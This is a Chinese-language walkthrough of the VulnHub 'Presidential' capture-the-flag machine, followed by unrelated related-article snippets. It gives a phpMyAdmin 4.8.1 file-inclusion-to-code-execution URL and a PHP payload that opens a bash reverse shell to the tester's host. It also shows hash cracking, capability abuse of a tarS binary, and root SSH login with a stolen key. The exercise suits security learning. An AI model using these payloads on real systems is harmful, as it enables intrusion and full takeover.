Presidential靶机总结

news2024/12/23 9:40:38

Presidential靶机渗透总结

靶机下载地址:
https://download.vulnhub.com/presidential/Presidential.ova

  1. 打开靶机,使用nmap扫描出靶机的ip和所有开放的端口
    可以看到靶机开放了80端口和2082端口
    在这里插入图片描述
    使用-sV参数查看详细服务
    80端口是http服务
    2082端口是ssh服务
    在这里插入图片描述
    那么我们先根据80端口打开网站在这里插入图片描述

  2. 网站上没有发现可以利用的漏洞点,源代码也没有提示的信息
    那么我们进行信息收集,目录爆破一波
    并没有发现有用的信息
    在这里插入图片描述
    我看网上目录爆破出一个config.php.bak文件,我这里可能是字典不行
    这是一个数据库的配置的备份文件

    $dbUser = "votebox";
    $dbPass = "casoj3FFASPsbyoRP";
    $dbHost = "localhost";
    $dbname = "votebox";
    

    在这里插入图片描述
    知道数据库的账户密码,但是不知道是什么数据库,也没有开放对应的端口,所以也无法登录,只能使用这个密码去尝试登录2082端口的ssh服务

    登录失败,允许限制在这里插入图片描述

  3. 目录爆破无法获得有用的信息,经过发现网站绑定了邮箱,很有可能是域名在这里插入图片描述
    将域名添加到hosts文件在这里插入图片描述
    再次打开网站
    在这里插入图片描述
    通过域名进行目录爆破,还是没有发现有用的信息
    在这里插入图片描述
    既然域名无法出结果,那么尝试去爆破子域名

    wfuzz -H 'HOST:FUZZ.votenow.local' -u 'http://192.168.11.135' -w /home/kali/Desktop/SecLists-master/Discovery/Web-Content/directory-list-2.3-medium.txt --hw 854,45
    

    这个字典是网上找的
    字典下载地址: https://github.com/danielmiessler/SecLists

    成功爆破出一个子域名,datasafe.votenow.local在这里插入图片描述
    将子域名添加到hosts文件中,然后根据子域名打开网站,发现是phpmyadmin
    并且使用前面的config.php.bak文件里面的账号成功登录
    用户名: votebox
    密码: casoj3FFASPsbyoRP在这里插入图片描述
    在这里插入图片描述

  4. 接下来就是根据新网站找到漏洞利用点
    在votebox数据库的users表里面发现新用户

    用户名: admin
    密码: $2y$12$d/nOEjKNgk/epF2BeAFaMu8hW4ae3JJk8ITyh48q97awT/G7eQ11i
    

    在这里插入图片描述
    密码看起来就是加密的,使用john工具进行解密

    john --wordlist=/usr/share/wordlists/rockyou.txt hash
    

    hash文件里面放的就是密码
    成功破解出密码: Stella
    在这里插入图片描述
    但是用户名admin密码Stella,无法登录phpmyadmin,也无法登录ssh,先跳过这个账户
    继续找phpmyadmin上有用的点在这里插入图片描述
    在这里插入图片描述

  5. 网页上暴漏出phpmyadmin的版本,4.8.1在这里插入图片描述
    利用searchsploit直接搜索phpmyadmin得到漏洞在这里插入图片描述
    在这里插入图片描述
    主要使用这个44928.txt,第一个44924.txt我试了下就只有文件包含,并且针对windows版本
    44928.txt可以进行远程代码执行
    在这里插入图片描述
    具体使用方法也在文件中写着,使用sql语句执行select ‘<?php phpinfo();exit;?>’ 这个payload

    然后远程包含session文件

    我们试一下,先执行sql语句在这里插入图片描述
    找到phpmyadmin的cookie值,这个值是session文件的文件名
    sess_ls7k5tk0ham4ls298ad3sega9cjgesup
    在这里插入图片描述
    然后利用poc中的url去访问,这里注意sessions要变成session,poc链中给的是错误的
    后面替换成session文件

    http://datasafe.votenow.local/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/session/sess_ls7k5tk0ham4ls298ad3sega9cjgesup
    

    成功解析
    在这里插入图片描述

  6. 改写poc,让它执行php反弹shell

    select '<?php system("bash -i >& /dev/tcp/192.168.11.131/4444 0>&1");exit;?>'
    

    这里需要注意,因为是包含session文件,而session文件存储在cookie中,因此需要重新打开浏览器,重新登录,使用新的cookie来进行文件包含,否则不会执行反弹shell代码在这里插入图片描述
    首先我尝试了所有会的提权方法,sudo滥用,suid提权,密码覆盖,计划任务,脏牛等
    并没有可以使用的提权方法

    然后换个思路
    之前我们获得了一个admin用户,密码Stella,这里可以切换到admin用户在这里插入图片描述
    在admin用户的家目录下,发现了user.txt和notes.txt在这里插入图片描述
    这里给到了提示, 使用新命令备份和压缩敏感文件
    获取可以利用这个提示来达到提权的作用在这里插入图片描述

  7. 根据提示,我们需要先找到那个新命令
    这里网上别人的办法是先通过一个新的提权方式
    capabilities提权

    查找:/usr/sbin/getcap -r / 2>/dev/null
    

    然后发现有个tarS的命令,很像备份和压缩的新命令在这里插入图片描述
    这个新命令的使用方法,也给出了在这里插入图片描述
    我们尝试去将root目录给压缩

    tarS -zcvf /tmp/root.tar /root
    

    在这里插入图片描述

    切换到tmp目录
    cd /tmp
    
    解压root.tar
    tar -zxvf ./root.tar
    

    在这里插入图片描述
    在root目录下成功获得了flag在这里插入图片描述

  8. 只是找到了flag,但是我们并没有获取到root的权限
    这里root目录下的.ssh目录里面存放了私钥
    可以利用ssh的私钥登录在这里插入图片描述
    先将id_rsa复制一份出来
    然后权限设置为700,必须是700
    最后利用-i参数进行ssh得到私钥登录

    chmod 0700 id_rsa
    ssh -i id_rsa root@192.168.11.135 -p 2082
    

    成功提权至root在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/183423.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

双向链表实现简单的增删查改

前言&#xff1a;上次分享了单向链表的增删查改&#xff0c;这次要介绍双向链表的增删查改&#xff0c;其实双向链表也有多种&#xff0c;这次主要介绍结构最复杂但是实现起功能反而最简单的带头双向循环链表&#xff0c;希望我的分享对各位有些许帮助。学习这篇文章的内容最好…

[虾说IT]GIS与三高架构(一)什么是高性能

大家好&#xff0c;我是消失了一个年假的不愿意透露姓名的神秘虾神&#xff0c;这是癸卯兔年虾神的第一个系列&#xff0c;聊聊GIS中的架构设计&#xff0c;不过你如果是做其他架构的也差不多……总之是架构是虾神的本职工作之一&#xff0c;那么培养更多的架构设计者和爱好者&…

基于前馈补偿的PID控制算法及仿真

在高精度伺服控制中&#xff0c;前馈控制可用来提高系统的跟踪性能。经典控制理论中的前馈控制设计是基于复合控制思想&#xff0c;当闭环系统为连续系统时&#xff0c;使前馈环节与闭环系统的传递函数之积为1&#xff0c;从而实现输出完全复现输入。利用前馈控制的思想&#x…

剑指 Offer 05. 替换空格 [C语言]

目录题目思路1代码1结果1思路2代码2结果2该文章只是用于记录考研复试刷题题目 请实现一个函数&#xff0c;把字符串 s 中的每个空格替换成"%20"。 示例 1&#xff1a; 输入&#xff1a;s “We are happy.” 输出&#xff1a;“We%20are%20happy.” 限制&#xff…

pnpm 简介

本文引用自 摸鱼wiki 1. 与npm&#xff0c;yarn性能比较 actioncachelockfilenode_modulesnpmpnpmYarnYarn PnPinstall33.8s20.1s20.3s40.7sinstall✔✔✔2.1s1.4s2.6sn/ainstall✔✔9.1s5.3s7.8s1.7sinstall✔13.5s9.3s14.1s7.7sinstall✔15s17.2s14.2s33.4sinstall✔✔2.5s3s…

2.JSX

JSX(JavaScript XML) 是 JavaScript 的语法扩展&#xff0c;格式上比较像模板语言。React支持JSX 下面两个代码可以实现相同的功能&#xff0c;JSX看起来要简洁一些 目录 1 使用环境 2 React中的JSX 2.1 特殊的属性 2.2 没有子节点的标签 2.3 小括号包裹 3 JSX使用…

vue 实现动态路由

vue-router对象中的addRoutes&#xff0c;用它来动态添加路由配置格式&#xff1a;router.addRoutes([路由配置对象]) this.$router.addRoutes([路由配置对象])举个例子&#xff1a;// 按钮 <button click"hAddRoute">addRoute</button>// 回调 hAddRout…

感染了恶意软件怎么办?

近日&#xff0c;研究人员披露了一种恶意软件&#xff0c;这种恶意软件已经感染了一系列广泛的 Linux 和 Windows 设备。恶意软件攻击事件的频繁发生&#xff0c;除了黑客的恶意攻击外&#xff0c;还有企业内部自身的问题&#xff0c;下面列举了7种容易感染恶意软件的途径和解决…

2023年2月软考高级-信息系统项目管理师【报名入口】

信息系统项目管理师是全国计算机技术与软件专业技术资格&#xff08;水平&#xff09;考试&#xff08;简称软考&#xff09;项目之一&#xff0c;是由国家人力资源和社会保障部、工业和信息化部共同组织的国家级考试&#xff0c;既属于国家职业资格考试&#xff0c;又是职称资…

coresight(六) power requestor

power requestor power requestor属于coresight组件。这个组件用来控制系统的power domain&#xff0c;最多可以控制32个。 如果没有power requestor&#xff0c;通过DAP&#xff0c;只能对整个coresight系统进行上下电操作&#xff0c;但是有了power requestor&#xff0c;可…

2Pai半导体-推出π122E61双通道数字隔离器 智能分压技术 兼容代替Si8622ET-IS

2Pai半导体-推出π122E61双通道数字隔离器 智能分压技术 兼容代替Si8622ET-IS 电路简单、稳定性更高 &#xff0c;具有出色的性能特征和可靠性&#xff0c;整体性能优于光耦和基于其他原理的数字隔离器产品。 产品传输通道间彼此独立&#xff0c;可实现多种传输方向的配置&…

开源工作流可以解决什么问题?

要了解这个问题&#xff0c;就需要先弄清楚相关概念。为什么要使用开源工作流&#xff0c;可以解决什么问题&#xff1f;如果要实现某个业务目标&#xff0c;提高办公协作效率&#xff0c;就可以用开源工作流在多个参与者之间&#xff0c;借助计算机&#xff0c;按照某种预定规…

Oracle重写sql经典50题

Oracle重写sql经典50题oracle与mysql还是有区别的表的数据只能一条一条的插日期的插入不能想mysql一样直接插&#xff0c;得转换格式mysql里的ifnull&#xff0c;oracle里没有这个函数&#xff0c;用nvl代替mysql里的limit在oracle里也没有&#xff0c;要用rownum查询&#xff…

力扣 76. 最小覆盖子串

一、题目 二、 示例 三、提示 四、 思路与代码实现 1. 思路 本题&#xff0c; 套用的是滑动窗口算法模板;初始化左右窗口边界指针&#xff08;要方便源串取值&#xff09; left 0, right 0&#xff0c; 为什么这样初始化&#xff1f; 若设置窗口索引为左闭右闭区间&#xf…

英语学习打卡day8

2023.1.29 1. affluent adj.富裕的&#xff0c;富足的&#xff0c;流畅的n.支流&#xff0c;富人 flu交通流动、发达-流畅的 affluent society affluent neighborhood 2.conception 概念&#xff0c;观念;受孕&#xff0c;怀孕 conceive v.构思&#xff0c;设想;使受孕&…

【Redis | 黑马点评】短信登陆

文章目录项目概述项目前置准备短信登陆基于Session实现登录流程实现发送短信验证码功能实现短信验证码登录和注册功能实现登录校验拦截器隐藏用户敏感信息集群的Session共享问题基于Redis实现共享Session登录登录拦截器的优化项目概述 短信登录 这一块我们会使用redis共享sess…

ExecutorService线程池

文章目录ExecutorService线程池1 ExecutorService API 介绍1.1 api1.1.1 awaitTermination 方法1.1.2 invokeAll 方法1.1.3 invokeAny方法1.1.4 shutdown 方法1.1.5 shutdownNow方法1.1.6 isShutdown方法1.1.7 submit方法1.1.8 isTerminated方法ExecutorService线程池 1 Execu…

Makefile学习笔记(一)

背景 最近在看ATF代码的时候&#xff0c;想要编译下&#xff0c;实施起来遇到一些问题&#xff0c;其中makefile有些命令&#xff0c;语法不是很清晰&#xff0c;故希望重新系统学习下。学习主要参考跟我一起写Makefile-陈皓.pdf。 第一部分、概述 makefile解决的问题&#…

周期矩形波的傅里叶级数展开(Matlab代码实现)

目录 &#x1f4a5;1 概述 &#x1f4da;2 运行结果 &#x1f389;3 参考文献 &#x1f468;‍&#x1f4bb;4 Matlab代码 &#x1f4a5;1 概述 当脉冲信号周期不变&#xff0c;脉冲宽度变大时&#xff0c;相邻谱线间隔不变&#xff0c;频谱包络线的零点频率逐渐变小&…

git查看分支、创建分支、合并分支

一、查看的git命令如下&#xff1a; git branch 列出本地已经存在的分支&#xff0c;并且当前分支会用*标记 git branch -r 查看远程版本库的分支列表 git branch -a 查看所有分支列表&#xff08;包括本地和远程&#xff0c;remotes/开头的表示远程分支&#xff09; git bran…